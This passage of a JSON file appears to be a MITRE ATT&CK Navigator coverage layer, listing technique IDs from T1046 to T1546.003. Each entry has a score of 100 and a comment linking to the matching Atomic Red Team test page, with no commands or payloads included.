1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqu
eID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T
1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"h
ttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491
.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techn
iqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546
